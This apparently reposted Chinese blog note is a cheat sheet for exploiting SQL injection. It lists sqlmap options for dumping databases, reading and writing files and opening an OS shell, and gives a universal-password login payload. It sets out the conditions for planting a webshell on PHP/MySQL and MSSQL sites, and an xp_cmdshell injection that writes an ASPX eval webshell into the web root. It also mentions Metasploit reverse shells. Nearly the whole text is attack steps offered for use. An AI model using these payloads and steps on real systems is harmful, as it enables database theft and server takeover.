zoukankan      html  css  js  c++  java
  • sql注入漏洞的利用

    漏洞的利用(sqlmap)

    数据库提权

    1.可以直接获取shell,可能会获取系统权限
    sqlmap -d "mysql://root:root@ip/数据库" --os-shell
    2.Mysql可以使用sql-shell然后进行udf提权

    万能密码登录

    ' or 1=1 '

    数据库dump

    -u 检测注入点
    --current-db 查看当前数据库
    --current-user 查看当前用户
    --Tables
    --columns
    --dump

    读写文件(需要有读写权限,和secure_file_priv有关)

    --file-read 读取文件
    --file-write 可以上传本地文件(参数接上本地的shell)
    --file-dest 写入到目标文件(参数接上入侵网站的地址)

    获取webshell条件

    1.php+MySQL 类型网站获取 webshell 条件
    (1)MySQL root 账号权限,也就配置 MySQL 连接的账号为 root 账号,不是 root 账号具
    备 root 权限也可以。
    (2)GPC 配置关闭,能使用单引号
    (3)有网站的绝对路径,且具备可以在文件夹写入文件的权限
    (4)没有配置 secure-file-priv 属性
    2.MSSQL+ASP/Asp.net 类型网站获取 webshell 条件
    (1)数据库用户是 sa
    (2)能够创建 xp_cmdshell,有的情况下虽然是 sa 账号,也能连接,但无法使用
    xp_cmdshell。 (3)知道真实路径
    (4)可以通过 echo 命令来生成 shell
    注入点直接写
    ;exec master..xp_cmdshell 'echo ^<%@ Page
    Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%^> >
    c:WWW233.aspx' ;--
    命令行下:
    echo ^<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%^> >
    c:WWW233.aspx'

    sqlmap获取webshell

    1.--os-shell
    (1)直接连接数据库(需要设置可以允许外来用户登录)
    (2)知道绝对路径,并且用户有可写权限
    2.msf反弹shell(可写权限和路径)
    上传木马文件,然后反弹shell
    3.上传shell
    通过sqlmap获取的账号和后台密码上传shell

  • 相关阅读:
    面试题|Docker的优缺点
    【华为出品】物联网全栈开发实战营来啦!送海思双目开发板
    Nginx实战|Nginx健康检查
    Linux中几个正则表达式的用法
    盘点提高国内访问 Github 的速度的 9 种方案
    一行代码如何隐藏 Linux 进程?
    (二)类加载机制与反射:类加载器
    (一)类加载机制与反射:类的加载,连接和初始化
    (八)多线程:线程相关类
    (七)多线程:线程池
  • 原文地址:https://www.cnblogs.com/lyxsalyd/p/12594697.html
Copyright © 2011-2022 走看看